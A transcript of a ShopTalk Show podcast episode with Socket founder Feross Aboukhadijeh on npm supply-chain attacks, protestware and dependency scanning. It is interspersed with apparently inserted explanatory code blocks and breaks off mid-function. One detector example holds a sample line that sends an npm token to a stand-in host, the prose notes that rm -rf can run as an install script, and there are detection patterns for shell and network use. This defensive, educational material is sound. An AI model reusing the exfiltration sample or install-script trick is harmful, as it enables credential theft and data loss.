524: Package Security with Feross Aboukhadijeh from Socket

July 18th 2022

Feross Aboukhadijeh talks with us about web security, what Socket aims to help with, how Socket compares to Dependabot or Snyk, how they analyze all the data for Socket, and what things developers should be thinking about with regards to security in their apps.

Tags: npm packages Security

Guests

Feross Aboukhadijeh

Founder + CEO of Socket Security, Stanford lecturer, and open-source maintainer of WebTorrent and StandardJS.

Time Jump Links

01:40 Guest introduction
03:30 Is Socket for JavaScript only or other languages as well?
07:05 Issues with open source
14:18 Sponsor: Reflect
15:47 What Socket can check for in packages
17:56 How do you get started with Socket?
22:49 How much should developers care about security?
30:09 Packages gathering telemetry
32:22 How does Socket compare to Dependabot or Snyk?
34:28 Sponsor: Notion
36:43 Where does Socket live in my workflow?
41:01 Can I run npm without scripts that autorun?
42:49 What do you teach at Stanford?
51:24 What do you think of typed languages?
55:04 How do you analyze all the data?
56:52 What did you write Socket in?

Transcript

[Banjo music]

MANTRA: Just Build Websites!

Dave Rupert: Hey there, Shop-o-maniacs. You're listening to another episode of the ShopTalk Show, a podcast all about front-end Web design and development. I'm Dave Rupert and with me is Chris Coyier. Hey, Chris! How are you?

Chris Coyier: Yeah. It's so funny how often you say front-end development and, lately, we're really graying the lines - lately. You know?

Dave: We're messing it up quite a bit, but that's fine. Hey, we should just say full stack.

Chris: All things Web really.

Dave: Now.

Chris: Yeah.

Dave: Blah.

Chris: [Laughter] Now, now. We have a niche. We have a niche. I'll slip in something about CSS later to make sure it's up there.

We have a special guest on the show today, though. Very exciting. Barely needs an introduction at all. Kind of like Madonna or something. Largely goes by your first name, right? The man behind feross.org, it's Feross! How ya doin', sir?

00:01:09

Feross Aboukhadijeh: Hey, folks! Awesome to be here. Thanks for having me.

Chris: Yeah! Yeah, that's awesome. We've been trying to line this up for a while. I'm glad it worked out.

You do so much interesting stuff. Everything you do, it seems like, you put your whole brain into it and go big - it seems like. I mean just two seconds before the call, we were on Riverside, and you're like, "I thought about building this."

[Laughter]

Chris: Which is great. And then Dave was like, "What's the most obscure question I can think of?" And he throws a zinger at him. He's just like, "Oh, I have the perfect answer for that."

Feross: [Laughter]

Chris: Yes. [Laughter] We're 30 seconds into the show and galaxy brain is happening to us. Just amazing stuff here.

But there's one big thing that we'll talk about, which is generally the topic of Web security, because you have (dare I call it) a startup in this space called Socket. The URL is socket.dev. Why don't we just start there and tell us just the 30-second version of yourself and then ending with what the heck Socket is.

00:02:09

Feross: Sure. Yeah, so I'm an open-source maintainer. I've worked on a bunch of JavaScript packages over the years. Maybe folks have heard of Standard.js, which is a code style and code quality tool; and WebTorrent, which is the first library that made BitTorrent work in the Web browser; and a bunch of other stuff.

And yeah, I mean the Socket product and kind of what I'm trying to work on with Socket really comes down to how do you know if you can trust your open-source dependencies.

Chris: Mm-hmm.

Feross: Because while working on open-source, I kind of got a first-hand look at how the sausage is made, and the thing is modern applications use thousands of dependencies. I think Hello, World for React is up to like 1,400 dependencies now if you run Create React App.

Chris: Hmm!

Feross: It's pretty crazy, yeah, and so you're trusting thousands of dependencies written by hundreds of maintainers. And installing even one package can lead to these dozens of transitive dependencies coming along for the ride. It's just far too easy for a bad actor to infiltrate what they call the software supply chain (so this sort of idea of where your code comes from) and wreak havoc.

So, yeah, Socket is a platform to protect you from those types of attacks, and a lot of companies and different individuals are using it right now. And so, I'm happy to jump into more about how that works.

Chris: Yeah. I think we should because it's just interesting. We can always go backwards and forwards in time. There's no rules. This is just a podcast.

Are we specifically talking about NPM, or are you using the words "supply chain" and that type of thing generically because maybe someday you might do it for Python too or whatever? Or do you already? What's up with that?

00:03:51

Feross: Yeah. We want to do all the languages eventually. Right now, we're 100% JavaScript focused, so JavaScript is not only the biggest ecosystem, but it's also kind of the one that, like, we get all the problems first.

Chris: [Laughter]

Feross: When you're the biggest -- some people think it's just something about JavaScript. Why are there always these news stories about attacks in JavaScript and in NPM?

Chris: Right.

Feross: I don't think it's because JavaScript programmers are worse or anything like that. Some people probably would love to say that and say, "Oh, those JavaScript folks, they've forgotten how to program because they need to install a package when they could have written a three-line function. They'll go and install a package for it instead." I don't buy that.

I mean there's some element of that that's true, but-- [Laughter]

Dave: Yeah. On average, isn't that true because I actually told somebody to use Lodash this week. Like, "Just use Lodash. We don't need to write that." [Laughter]

Feross: Yeah. You know it's partly true. I think it's a few things. One is NPM was the first package manager to really solve dependency hell. So, if you go to Python or these older package managers and you install foo version 1, and then you install another dependency later on (and that dependency wants to use foo version 2), Python will just throw up its hands and say, "We don't know what to do because you're trying to use foo version 1 and something else in your project wants foo version 2, and we cannot install both foo version 1 and foo version 2. You're screwed." Right?

Whereas NPM said, "Wait a minute. Why don't we just install both of those versions and give foo version 1 to anything that wants foo version 1 and give foo version 2 to anything that wants foo version 2?"
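
As a rough illustration of the idea Feross describes here, the following TypeScript sketch plans an install layout in which the first requested version of a package sits at the top level and any conflicting version is nested under the package that asked for it. It is a simplified model under stated assumptions, not npm's actual resolution algorithm: the names `Dependent` and `planInstall` are hypothetical, and versions are treated as exact strings rather than semver ranges.

```typescript
// Hypothetical model: each dependent lists the exact version it wants.
interface Dependent {
  name: string;
  requires: Record<string, string>; // dependency name -> exact version
}

// Returns a map of install path -> "name@version".
// Simplification: the first version seen is placed at the top level;
// any different version is nested under the dependent that needs it.
function planInstall(dependents: Dependent[]): Record<string, string> {
  const layout: Record<string, string> = {};
  const topLevel: Record<string, string> = {};

  for (const dependent of dependents) {
    for (const [name, version] of Object.entries(dependent.requires)) {
      if (!(name in topLevel)) {
        topLevel[name] = version;
        layout[`node_modules/${name}`] = `${name}@${version}`;
      } else if (topLevel[name] !== version) {
        // Conflict: keep both copies instead of failing the install.
        layout[`node_modules/${dependent.name}/node_modules/${name}`] =
          `${name}@${version}`;
      }
    }
  }
  return layout;
}

// Two packages that want different versions of foo.
const examplePlan = planInstall([
  { name: "a", requires: { foo: "1.0.0" } },
  { name: "b", requires: { foo: "2.0.0" } },
]);
// examplePlan is:
// {
//   "node_modules/foo": "foo@1.0.0",
//   "node_modules/b/node_modules/foo": "foo@2.0.0"
// }
```

In this model the install never fails on a version conflict; the cost is a second copy of `foo` on disk, which is the trade-off discussed next.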

Chris: [Laughter] Is that better, though? I guess it kind of -- yeah, maybe it is better, but it leads to bigger packages, right? The front-end side of my soul says, "That's horrible," and the back-end says, "Ah, who cares?" You know?

Feross: Exactly. Exactly, yeah, and it sort of makes development easier. It means that when you type install, it'll never fail. It'll just work, and so it optimizes for that development experience being really nice.

The downside is, of course, like what you said. You'll end up with multiple versions, and it also creates this kind of psychological thing where now the cost of adding a dependency is super low.

Chris: Hmm.

Feross: If I as a maintainer know that I could just depend on this package and it's not going to cause any problems for my users, then I don't have to think twice about it. Whereas in Python, if you introduce a dependency on foo, you're thinking ten times about it because if that version is different than what another package needs then you just caused a ton of pain for your users. So, I think that's the big reason why NPM ended up with this culture of just a lot of dependencies.

Chris: Oh, I see. Users meaning not necessarily the users of your website; the users of your open-source package.

Feross: Exactly. Yeah, there's no cost for a maintainer of a package to add dependencies to it. I mean there's less cost because you're not going to create this dependency hell situation for the users of the package.

Chris: Right.

00:06:40

Feross: In some ways, too, it's good that we don't rewrite this code because copying and pasting code in from Stack Overflow into your project just to avoid a dependency, that has some downsides too that people don't like to talk about. I mean left-pad is an example that folks like to really point to and say, "Oh, why can't people just write that? Have we forgotten how to program?" And that's true - somewhat.

Chris: That's true. All it did was put some - I don't know - white space or something on the side of a string. But what was the story to remind ourselves of what went wrong there? Was it a programmer who decided to delete that package? Is that how that went down?

00:07:16

Feross: The programmer there, I think he had a conflict with NPM in some way. He was upset that they took one of his package names of another one of his packages, and then he just decided to unpublish all his code, and that broke a bunch of people's builds. Then it actually led directly to NPM making unpublishing not possible in most circumstances.

Chris: Oh... So, it had a big fallout, so there are weaknesses to the supply chain. Even though it's perhaps better than whatever Python's version. There are still weaknesses in the chain, as it were.

Feross: Mm-hmm. Yeah, and more than just unpublishing packages. You guys probably saw the news about this but, back in January of this year, there was a maintainer who had a similar sort of moment where he decided to go rogue, and he added some pretty weird code into his packages that printed all kinds of weird conspiracy messages and added infinite loops -- while true. That kind of thing into the code.

Chris: Yeah.

Feross: Sort of just sabotaged his own code, and so that kind of thing can happen that isn't necessarily a security issue as much as just a quality issue. He decided to ruin his own code.

Chris: Yeah.

Feross: There have been cases of protestware, too. You've probably seen these where someone decided to--

Dave: Yeah.

Chris: I saw a blog post that you had about that that said that it was -- I think it looked like maybe an IP table or something and was like, "Was this from Russia?"

Feross: Mm-hmm.

Chris: "Then return false," or something - on something pretty big. And even you said styled-components, which our front-end audience is probably familiar with. Didn't you say theirs was pretty benign? It just printed something to the console or something but, ultimately, still performed its function?

00:09:12

Feross: Yeah. So, there are various levels of badness here. On the most benign side of things with protestware, there are folks who are just printing out a console log at install time to sort of express their opinions. I think that's totally fine.

I think, on the opposite extreme, there was someone who published code that would delete your hard drive if you were to be coming from Russia.

Chris: Wow!

Feross: So, they would look at your IP address--

Chris: We should pause on that one for a minute. Yeah, yeah, first explain it, but I definitely have some questions there.

Feross: I don't know. It's one thing to kind of use your platform as a maintainer to protest and sort of use your voice to support things you believe in. And then it's another to sort of just kind of blindly destroy people's data and stuff. I personally think that one kind of crossed the line there.

It would look at your IP address, figure out where it thought you were coming from, and if it thought you were Russian, it would just start iterating through all the files on your hard drive and replacing the contents with a heart emoji, so you just lose all your files.

Chris: Wow! And it presumably -- did it happen to anybody? Did it happen to a lot of people? Was it real? [Laughter]

Feross: Mm-hmm. So, it was included in the package that had, I think, millions or tens of millions of downloads, and it was live for a few hours, so it definitely hit real people.

Chris: Wow! If it happened to me and my stock MacBook here and whatever--

Dave: I think it was in the Nuxt CLI, I think it got hit by it, so yeah.

Chris: Wow!

Feross: Mm-hmm.

Dave: Or the Vue CLI, maybe. Yeah.

Chris: So, there are always joke comics or something. What is it? rm -rf - you know. Is that star or something? Is it as simple as that? Is that kind of command possible to run via an NPM script that literally just deletes your fricken' hard drive?

00:11:01

Feross: So, yeah. This particular package did it in a more complicated way because it didn't want to just rm -rf it. It wanted to put heart emojis everywhere on your computer (for a reason).

Chris: Yeah.

Feross: But you can actually just add rm -rf as an install script, and NPM will happily run that as a post-install step after the package is installed.

Chris: So, skipping to the end a little bit, will Socket look for that? Do I need--?

Feross: [Laughter]

Chris: Because NPM won't, right? Apparently, they don't care if rm -rf just lives in a freakin' script, which blows my mind. I mean that's at the heart of the issue, right? That NPM--

There's some stuff on there that's just like a CSS file or something. Pretty benign. But some of it is executable code. It could be a fricken' binary. It could be whatever, right?

Not only does it come down to my computer, and I know that I can run it; there are also things called install scripts, right? So, if in the package.json one of the scripts in there happens to be named something like prepare or install or postinstall or something, just by virtue of me typing NPM install, which we all do a million times a day -- I mean maybe not a day but you know it's the most common thing we do on NPM -- that code will literally execute with my administrator privileges, presumably, right?

Feross: Mm-hmm.

Chris: Isn't that mind-blowing a little bit?

Feross: Mm-hmm.

Chris: It seems like this is a problem, but it's almost amazing that it hasn't been an even bigger problem.

Feross: Yeah. No, I totally agree. I think, in some ways, it's a miracle. It's like how most people are actually good, like the fact that you can just take this code that you haven't even--

Chris: Apparently, we've proved it. Yeah. [Laughter]

Feross: Yeah. [Laughter] Yeah, I mean I think 99.9% -- some really high percentage -- of maintainers are publishing really good code that you can just blindly install and use and it mostly just works.

The problem comes in when you have an exception to the rule, and you have somebody abusing that trust that folks have in open source. They take over a package by hijacking it in some way. Maybe the maintainer used a weak password. Maybe they sent a few good pull requests and then, eventually, got added as a co-maintainer to the project, and then they go rogue at that point.

There are different ways it can happen, but it is, overall, pretty rare if you think about the number of NPM installs that we're running that this happens. But when it does happen, when a really popular package does get taken over, then it can wreak havoc. Right?

It's something that NPM cares about. To your point about NPM, it's something they care about fixing and they are trying to scan for malicious packages, but for whatever reason, their approach currently is a very reactive thing where they'll let a package get uploaded and then, after it's live, they have some kind of step that comes in and tries to see if it's malware and then will take it down. But during the time that it's live, it could have affected people.

Chris: I see.

Feross: And then whatever they're using is just not that sophisticated yet because stuff sort of gets by all the time (just based on the news headlines that you see). I would say that they care, but it's just not working very well right now.

Chris: Sure. They might have to buy you or something, right?

Feross: [Laughter] Yeah, maybe.

00:14:18

[Banjo music starts]

Chris: This episode of ShopTalk Show is brought to you in part by Reflect. That's reflect.run/shoptalk. Follow the link in the show notes.

Reflect is an automated no code testing tool that shaves countless hours off your end-to-end testing time from writing and maintaining tests to root causing to debugging errors. Creating tests is as simple as using your Web app, so visit your site within Reflect's simulated browser and perform the actions you want to test. Then Reflect auto-generates the selectors and does all the painstaking work of test creation and maintenance for you to do in minutes.

The features include visual validation, cross-browser testing (Safari, Chrome, Firefox, Edge), email, and SMS validation. Sign up through the referral link here and you get a two-week trial, and you get to claim a free T-shirt. Hey, why not? Reflect.run/shoptalk.

Really an amazing tool. You all know about end-to-end tests, right? You go to your website. Let's say it's a Trello-like website. That's kind of the demo they have on their homepage. You need to test this app. It's your job to make sure that you don't break this app, which is the point of tests.

Let's say you write a test that's like, "Okay. Go to this URL. Click the new card button. Enter this text." Maybe it has HTML in it or something. "Then click 'Add Card,'" and then the test can be like, "Was the card created? Does it have the right text in it? Did it go in the right place?" That's an end-to-end test. It's testing that your app works, essentially, across a whole mini workflow. Really useful stuff.

And then that test runs every time there's a PR and makes sure your app works forever, which is just worth its weight in gold. So, thanks so much for the support, Reflect.

[Banjo music stops]

00:16:13

Chris: All right, I think I saw -- maybe it was part of the marketing for socket.dev or something, that was like, "Okay, there's been a new release of a package, and there's some kind of warning that comes up."

I don't know where you see it exactly. I'm sure you can explain. But it was like this dependency that you have, all of a sudden, it didn't have an install script before but now it does. And that should be a moment, as a maintainer, where you're like, "Whoa! I better look at that before I allow that into my code base." Do I have that right? Because that would be something that would be a concern, right? Perhaps it's some of this protestware.

Feross: Mm-hmm. Exactly. Yeah, that's what we realized.

When I was looking at all the attacks that have been happening, I kind of dug into the code and said, "Okay, what are the things that people do when they take over a package? What do the bad guys do?"

It was always -- it usually involved somehow stealing data, sending it to the network, so reading and writing variables, reading files, sending it to the network, or running shell commands. And so, we looked at just what are the signals here that we should be looking at that could indicate that a package has been taken over or has significantly changed its behavior in a way that is worrying. Right?

Chris: Mm-hmm.

Feross: And any time a package that you're using does one of those things, that's actually a really good sign that you should take a second look and really dig in and be able to answer the question, "Why does this package suddenly need to be able to do an install script or to run a shell command?"
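
The "it didn't have an install script before but now it does" check can be sketched in a few lines of TypeScript. This is only an illustration under stated assumptions, not Socket's implementation: `PackageManifest`, `INSTALL_HOOKS`, and `newInstallScripts` are hypothetical names, the manifests are hand-written examples, and the hook list is limited to the script names mentioned in the conversation plus `preinstall`.

```typescript
// Minimal shape of the package.json fields this sketch looks at.
interface PackageManifest {
  name: string;
  version: string;
  scripts?: Record<string, string>;
}

// Script names that npm may run automatically around installation.
// (Assumption: this list is illustrative, not exhaustive.)
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Returns the install hooks present in `next` that were absent in `previous`.
function newInstallScripts(
  previous: PackageManifest,
  next: PackageManifest
): string[] {
  const before = previous.scripts ?? {};
  const after = next.scripts ?? {};
  return INSTALL_HOOKS.filter((hook) => hook in after && !(hook in before));
}

// Hypothetical dropdown component that gains a postinstall script in a patch release.
const oldManifest: PackageManifest = {
  name: "example-dropdown",
  version: "1.0.0",
  scripts: { test: "jest" },
};
const newManifest: PackageManifest = {
  name: "example-dropdown",
  version: "1.0.1",
  scripts: { test: "jest", postinstall: "node setup.js" },
};

const addedHooks = newInstallScripts(oldManifest, newManifest);
// addedHooks is ["postinstall"]
```

A non-empty result is the kind of change worth a second look before merging. Separately, npm's `--ignore-scripts` flag skips these hooks at install time.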

Chris: Oh, so you know if it ran a bash shell script. If a package didn't run a shell script, and now it does run a shell script, that's a thing that Socket can detect? Maybe instead of just asking you the really specific questions, what does Socket do? [Laughter]

Feross: [Laughter] Yeah, yeah. Sure.

Dave: What would you say you do here?

[Laughter]

00:18:08

Feross: So, I take the packages from here, and I--

Dave: From the developers and give it to the customers.

[Laughter]

Chris: I deal with the goddam packages!

[Laughter]

Feross: Exactly. Yeah, that's a great movie. No, so what we do is we have a few things. So, the first -- probably the easiest way to get started with Socket is you could just go to socket.dev, and you can type in a package that you're curious about and then look at what Socket has found in that package.

So, we give you a couple of things. We'll give you scores for the package, so what's the quality of it, what's the security status of it, what's the maintenance. Does it have a license you can use? Just sort of high-level scores. It kind of looks like Lighthouse, to be honest, if you look at it. It kind of looks like zero to 100, Lighthouse style scores for each package.

Then it also gives you any alerts or any kind of high-importance issues that we found in the package. So, that'll be stuff like, "Hey, this package contains a giant obfuscated blob of code in it. Click here to see what it is." Right?

Or "Hey, this package has had a new maintainer added recently." Or "Hey, this package will send your data to the network. Click here to see the line of code where it's going to send a fetch request and talk to the network." Right?

At a quick glance, you can get a sense for what does this package do. If it's something like you're installing Express and Express talks to the network, well, that's not surprising. It's a Web server. Obviously, Express is going to need to talk to the network, right?

But if you're installing a component and it's a dropdown, a little dropdown input component or something, and you see that that is reading your environment variables and sending them to the network, and it has an install script, you're going to say, "What is going on here? This makes no sense." Right?

It gives you a sense of -- it's almost like when you install an app on your phone and it wants to access your contacts or look at your photos.

Chris: Yeah.

Feross: The app has to ask you first, right? It has to disclose. It can't just do it. That's kind of what we're trying to bring to NPM packages, so you can see, at a glance, this is what it's going to do, almost like a nutrition facts label you have on food. It will tell you this has this many calories, this much sugar, and it's up to you to decide is 300 calories good or bad. I mean it depends on what your goals are.

Maybe accessing the network is okay, but maybe it's not. And so, we want to just tell you sort of what it's doing without you needing to jump into the code and really evaluate every line of code.
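
To make the "nutrition facts label" idea concrete, here is a deliberately naive TypeScript sketch that scans a source string for a few capability signals (network, shell, environment variables, filesystem). It is an assumption-heavy illustration, not how Socket analyzes packages: the names `Capability`, `SIGNALS`, and `detectCapabilities` are hypothetical, the URL in the sample is a placeholder, and a regular-expression scan like this is easy to evade compared with real static analysis.

```typescript
type Capability = "network" | "shell" | "environment" | "filesystem";

// Naive textual signals. A real tool would parse the code rather than
// pattern-match it; these patterns are illustrative only.
const SIGNALS: Record<Capability, RegExp> = {
  network: /\bfetch\s*\(|require\(\s*['"](?:node:)?(?:https?|net)['"]\s*\)/,
  shell: /require\(\s*['"](?:node:)?child_process['"]\s*\)/,
  environment: /\bprocess\.env\b/,
  filesystem: /require\(\s*['"](?:node:)?fs['"]\s*\)/,
};

// Returns the capabilities whose signal appears in the given source text.
function detectCapabilities(source: string): Capability[] {
  return (Object.keys(SIGNALS) as Capability[]).filter((capability) =>
    SIGNALS[capability].test(source)
  );
}

// A suspicious snippet for a "dropdown component": it reads an
// environment variable and sends it over the network.
const sampleSource =
  'const token = process.env.NPM_TOKEN; ' +
  'fetch("https://example.invalid/collect", { method: "POST", body: token });';

const sampleCapabilities = detectCapabilities(sampleSource);
// sampleCapabilities is ["network", "environment"]
```

Whether a given capability is a problem depends on the package: network access is expected from a Web server and surprising from a dropdown.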

Chris: That's great. Yeah, okay, so you can see this Lighthouse-type score. Pretty useful. Yeah, that's evaluating it at some particular stage of me caring. Maybe I'm adding a new package, so I would look at these nutrition facts to see if it's kind of worthy of doing that or what I should be worried about.

But probably more on a day-to-day level, I'm worried about the crap happening to my project. Just what happened one day. Ah!

Feross: Mm-hmm.

Chris: What's that like?

00:21:04

Feross: Yeah, so for that we have a GitHub app that you can install. So, if you go ahead and add our GitHub app, the Socket GitHub app to your repo, then we will automatically watch for new pull requests coming through. So, any time a new PR lands or a new PR is sent, Socket will look at what dependencies have been added in that pull request and what dependencies have been updated in that pull request.

Chris: Oh, there you go.

Feross: And then when we see that there is a difference in the behavior, we will leave a comment on that PR as well as we have a check, so we can put a red X on that PR and say that someone should take a closer look at this.

Chris: Nice. You could, if you wanted to, make it un-mergeable.

Feross: Mm-hmm. Exactly. Yeah, exactly. And you can use that to sort of--

I think of it as I don't think, in general, that we want to--

Our philosophy isn't to be an annoying security tool that blocks developers from getting their job done, although you can definitely configure it to be that way if you want. But I'm much more of the opinion that developers actually care. They care about this stuff. They want to do the right thing. But right now, it's just way too hard. It's too much work to read all the lines of code of your dependencies, so no one is doing it. But I think if people have a comment coming in and just giving them a little bit of extra information, that developers will actually do the right thing there.

If I see that an alert is coming through and it tells me that this package is doing something absolutely ridiculous, I'm not going to want to merge that. I'm not going to ignore that.

Chris: Hmm. Right.

Feross: It's not something that you necessarily need to block, is kind of my philosophy.

Dave: Does Socket -- or maybe you put some thought into this.

One issue I have is I'll NPM install, and it's like, "You have 72,000 vulnerabilities."

Feross: Mm-hmm.

Dave: "Auto-fix?" Auto-fix obviously breaks everything. Then I look into some of them, and a lot of it is, "Oh, Jest has a RegEx that's weird," or something. Jest never makes it to production. Is this something you consider? Does NPM kind of need to evolve in terms of just dependencies and dev dependencies? What's your thoughts on those kinds of issues and how you should think about them?

I think Dan Abramov famously was like, "Don't care." [Laughter]

Feross: [Laughter]

Dave: I don't know.

Feross: Yeah.

Dave: But--

00:23:48

Feross: So, that's totally valid, and I think part of the reason why developers get so much fatigue around security is because of those types of alerts.

Look. I care a lot about security. I teach a Web security class at Stanford. I literally am working on this security company, and I basically ignore the NPM audit results.

Chris: [Laughter]

Dave: Yeah.

Feross: What does that tell you, right?

Dave: Super valuable. I should--

[Laughter]

Dave: --always say yes. Yeah.

Feross: Yeah, I mean so I think we need to be careful when we're building security tools to really care a lot about the signal-to-noise ratio. I think NPM audit, while it was a good attempt, it's just sort of too noisy in its current form. And it's to the point where everybody is pretty much just shipping code to production that has dozens or hundreds of vulnerabilities, and they don't know whether that's a big deal or not. They really just don't know what to do about it, and so it just ends up being ignored.

Part of the problem here is that there are a lot of companies, there are a lot of big companies in this space, that try to basically find as many of these vulnerabilities as possible. There are all these incentives. The security researchers, they want to be able to claim that they found something, and they also have an incentive to inflate the significance of it and say it's critical or it's high when it's maybe low.

Chris: They sure do. [Laughter]

Feross: Yeah. There are also the companies wanting to say that they have a database of the most vulnerabilities possible so they can sell that to people, so that's all contributing to this inflation, where these not-important things that have to do with RegExes being slow - or whatever - in a dev tool get inflated into a critical issue - or whatever.

Socket is trying to not have that problem because it's probably worth taking a second here just to distinguish because there are known vulnerabilities, which are--

Dave: Like CVEs or whatever. Yeah.

Feross: CVEs, vulnerabilities, those are usually accidents that are--

Chris: What's that? I mean I figure I'm a podcast host and I don't know, so maybe somebody in the audience doesn't know too. [Laughter]

00:25:51

Feross: It stands for Common Vulnerabilities and Exposures, and it's a list of computer security bugs, basically. It's run by -- it's this database that's run by the government, by the U.S. government, and they basically--

It's like a central place to submit all the known security flaws in all software, so desktop apps, open-source libraries, everything.

Chris: Wow!

Feross: It all just goes into this big database.

Chris: Okay.

Feross: It's run by the government, and when you're a security researcher and you find a bug, your goal is to get a CVE issued for it and write up a report. Then you can say, "Oh, I found this many CVEs this year," and it's a useful database because then tools can download it and that's basically what NPM audit does is it just downloads this database and tells you when you have a package that's in that list, basically. Right?
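
The "download a list of known issues and tell you when one of your packages is on it" approach can be sketched as follows in TypeScript. This is a minimal model under stated assumptions, not the real `npm audit` logic or data format: `Advisory`, `compareVersions`, and `auditInstalled` are hypothetical names, the advisories and package names are made up for illustration, and versions are assumed to be plain `x.y.z` strings.

```typescript
// Hypothetical advisory record: versions below `fixedIn` are affected.
interface Advisory {
  id: string;
  packageName: string;
  fixedIn: string;
  severity: "low" | "moderate" | "high" | "critical";
}

// Compares plain "x.y.z" versions numerically.
// Returns -1, 0, or 1. Pre-release tags are not handled.
function compareVersions(a: string, b: string): number {
  const partsA = a.split(".").map(Number);
  const partsB = b.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const diff = (partsA[i] ?? 0) - (partsB[i] ?? 0);
    if (diff !== 0) return diff < 0 ? -1 : 1;
  }
  return 0;
}

// Returns the advisories that apply to the installed versions.
function auditInstalled(
  installed: Record<string, string>,
  advisories: Advisory[]
): Advisory[] {
  return advisories.filter((advisory) => {
    const version = installed[advisory.packageName];
    return (
      version !== undefined && compareVersions(version, advisory.fixedIn) < 0
    );
  });
}

// Made-up data: one installed package is older than its fixed version.
const findings = auditInstalled(
  { "example-lib": "1.2.3", "other-lib": "2.0.0" },
  [
    { id: "EXAMPLE-0001", packageName: "example-lib", fixedIn: "1.3.0", severity: "high" },
    { id: "EXAMPLE-0002", packageName: "other-lib", fixedIn: "1.9.0", severity: "low" },
  ]
);
// findings contains only the EXAMPLE-0001 advisory
```

Note what this kind of lookup cannot do: a package that was hijacked an hour ago has no entry in the list yet, so it passes cleanly.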

Chris: Oh, wow! How did I not know that? That seems like a big deal. Okay. Whoops. Well--

Dave: But it's sort of like, too, if you're reporting a vulnerability, you do it the official way. It gets logged. Does a thing. I think there's sort of like -- yeah. I don't know. It's just interesting. It's sort of like we have reported this bug in an official capacity. It's not just like some guy thought this was bad. You know?

Feross: Exactly, yeah. So, I mean, that's all good. People should be scanning for CVEs in this way, to some extent. There are sometimes really bad ones, right? I think the tooling could be better at highlighting when ones are truly, truly critical versus just not a big deal because it's in a dev tool or something like that.

But Socket is more interested and more focused on supply chain attacks because, right now, there's really nothing out there that does a good job with catching those because if you're relying on this database of known issues that folks have submitted, security researchers have submitted reports to, that's not going to help catch when a package is hijacked and contains malware and no one has found it yet. Right?

You're going to run NPM install, and your computer is going to get owned. Then tomorrow, in the news, when someone catches it finally and there's a report written about it, you're going to be like, "Oh, crap. Did I install that?" Then you're going to--

Chris: Right.

Feross: It'll be too late at that point, basically.

00:28:15

Feross: So, the point of Socket is if you are building a security-critical app, if you're building anything that's in production and you have user data or even on your own computer that you're worried about infecting, you don't want to just be blindly NPM installing code without having even read it.

And so, you want to have some check, some basic evaluation that will tell you if this is a likely supply chain attack, and that's what Socket is trying to do, so it can catch those packages that you don't even want to--

Here's the thing. Known vulnerabilities, you can run those. You can install them on your computer today and nothing is going to happen. It just means that if a bad guy sends the right HTTP request, maybe that library will be vulnerable in some way. But with a supply chain attack, it's literally malware. You don't want to even run that once. You don't want to NPM install that even one time. There's nothing--

There's no way you can say, "Oh, we'll fix that next month," or whatever. No, you are going to have problems today if you install that. Right?

Chris: [Laughter]

Dave: Yeah, okay. Breaking it into two levels of severity, it's like the oops, that's vulnerable code, and then there's uh-oh, red siren.

Chris: Sirens blaring. Yeah.

Dave: Somebody is trying to attack me from my Node modules.

Chris: Interestingly, those bigger problems have less tooling to help you. There's some irony there or something.

Feross: Exactly, yeah. Exactly, so that's what we're trying to address. We think that if you look for this stuff, like network access and shell usage and the presence of weird, big blobs of code and this kind of thing, then that'll actually catch supply chain attacks and also just help people pick better packages because there's just a lot of weirdness going on in NPM (if you really poke around). [Laughter] It even goes beyond the security angle as well. It's kind of wild what you'll find if you click around Socket for a little bit. So, yeah.

00:30:09

Feross: There's even telemetry. Have you guys heard about this, like packages gathering telemetry and sending it to the maintainer?

Chris: Is telemetry just usage data, essentially?

Feross: Yeah. Yeah. There are some packages that will -- you can add to your package if you're a maintainer, and then it'll send your IP address and the name of your project and stuff like that to the maintainer to kind of figure out which companies. They want to figure out which companies are installing their code.

Dave: Actually, literally, there was a CVE, a Dependabot alert, you know, for this parse-url, which I looked at. I was like, "Who is using parse-url in my app?"

Well, it's Nuxt, Nuxt telemetry, and then git-url-parse. I was like, "Why does Nuxt need to know my Git URL?" But I guess they do - or they're trying.

Chris: Wow. Weird.

Feross: For that one, Socket will catch that and tell you how to disable the telemetry. So, in the GitHub comment, when you add Nuxt for the first time.

Dave: Yeah.

Feross: Or when you do a scan to get the current state of your repo, we'll tell you, "You have telemetry in one dependency, and here is the environment variable you should set or the option you should pass when you initialize that to turn that off."

Chris: Well, that's cool.

Feross: Yeah.

Dave: Geez. Yeah.

Chris: Good software has a pretty strong opinion about what it does and what it doesn't do, and what yours doesn't do is, like, "Oh, some React plugin has a little XSS thing," or something. You just don't. Not Socket's job. We're in the bigger--

Feross: Mm-hmm.

Chris: Or do you report on all that little crap too? You just don't surface it as strongly.

00:31:57

Feross: Yeah. We do have that data and it does feed into the scores. We have a vulnerability score, but it's not what makes Socket different or unique, and we don't currently, like, we're not planning to go and just start spamming people with that information because we want the signal to be really, really high, so the stuff that we will leave a comment on (on your pull request) is all very high signal stuff that you're going to be really glad that you got notified about.

Chris: Good. That sounds good. Dave mentioned Dependabot, so that's a thing that is - I don't know - related, I guess, because it's like, "Oh, shoot. There's some update," and the reason that the package was updated is because it fixes some problem. That's pretty useful of GitHub to have done. But in that -- what is it, CRV--?

Dave: CVE.

Feross: [Laughter]

Chris: Is that based on that data? Probably?

Feross: Exactly. Yeah.

Chris: Yeah. Okay. And then not to force you to talk about potential competitors or anything, but it's only because I don't understand this all the way. There's a thing called snyk.io that claims to help with vulnerability stuff too that I don't fully understand despite having friends who have worked there in the past. Are you a direct competitor of that, or are they just different somehow?

00:33:18

Feross: So, they're basically a competitor to Dependabot, and they just do the CVEs, so the known vulnerabilities.

Chris: Okay.

Feross: Here's the thing. The security industry, they're really obsessed with known vulnerabilities because it's easy because all the data is there. It's public in a big database, and it's not that hard to write a tool that looks at your package JSON and tells you, "Hey, you have this version that is in a list, so you should not use that anymore. You should update." That's what pretty much all this tooling does.
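The known-vulnerability check Feross describes can be sketched in a few lines. This is a minimal illustration in Python, not how any particular tool works: the advisory list, the package names, and the function name `find_known_vulnerable` are all made up for the example, and it assumes exact pinned versions rather than the version ranges real manifests often use.

```python
import json

# Hypothetical advisory list: package name -> versions with a known vulnerability.
# Real tools pull this from a public advisory database; these entries are made up.
KNOWN_VULNERABLE = {
    "example-parser": {"1.0.0", "1.0.1"},
    "example-server": {"2.3.0"},
}


def find_known_vulnerable(package_json_text):
    """Return (name, version) pairs from a package.json that are on the list."""
    manifest = json.loads(package_json_text)
    findings = []
    for section in ("dependencies", "devDependencies"):
        for name, version in manifest.get(section, {}).items():
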